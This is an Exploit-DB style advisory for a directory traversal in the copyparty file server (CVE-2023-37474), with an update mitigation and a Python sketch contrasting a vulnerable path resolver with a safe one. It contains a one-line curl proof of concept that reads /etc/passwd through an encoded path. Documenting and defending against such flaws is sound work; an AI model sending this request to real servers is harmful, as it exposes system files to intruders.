Vendor: copyparty
By: Vartamtzidis Theodoros
CVSS: 7.5 (HIGH)
Type: Directory Traversal
CWE: 22
Product Name: copyparty
Affected Version From: 1
Affected Version To: 1.8.2002
Patch Exists: YES
Related CVE: CVE-2023-37474
CPE: a:copyparty_project:copyparty:1.8.2
Platforms Tested: Debian Linux
2023

copyparty 1.8.2 – Directory Traversal

Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

Mitigation:

Update to version 1.8.2 or later.

Exploit-DB raw data:

# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474




#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

#POC
curl -i -s -k -X  GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
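
The following Python sketch shows how a percent-encoded absolute path like the one in the PoC request can escape a static directory, next to a resolver that rejects it. It is an added example, not copyparty's code or its actual fix; `WEB_ROOT`, `naive_resolve`, `safe_resolve` and the file name `deps/app.js` are hypothetical, and the decode-then-join pattern is an assumed illustration of this bug class.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Hypothetical static-asset directory standing in for the server's web root.
WEB_ROOT = "/srv/app/web"


def naive_resolve(url_tail: str) -> str:
    """Vulnerable pattern: decode the URL tail, then join it unchecked."""
    # os.path.join drops WEB_ROOT entirely when the decoded tail is absolute,
    # so "%2Fetc%2Fpasswd" resolves to "/etc/passwd".
    return os.path.join(WEB_ROOT, unquote(url_tail))


def safe_resolve(url_tail: str) -> Optional[str]:
    """Return a path inside WEB_ROOT, or None if the request would escape it."""
    rel = unquote(url_tail)
    # Reject NUL bytes and absolute paths outright instead of trying to fix them.
    if "\x00" in rel or rel.startswith(("/", "\\")) or os.path.isabs(rel):
        return None
    root = os.path.realpath(WEB_ROOT)
    # realpath collapses ".." segments and follows symlinks before the check.
    candidate = os.path.realpath(os.path.join(root, rel))
    # The resolved path must still have the root as its common prefix.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample URL tails (the part after the static prefix).
    for tail in ("deps/app.js", "%2Fetc%2Fpasswd", "..%2F..%2Fetc%2Fpasswd"):
        print(f"{tail!r:28} naive={naive_resolve(tail)!r:32} safe={safe_resolve(tail)!r}")
```

The containment check runs on the fully decoded and resolved path, which is why both the encoded absolute path and the `..` variant are refused while an ordinary relative asset still resolves.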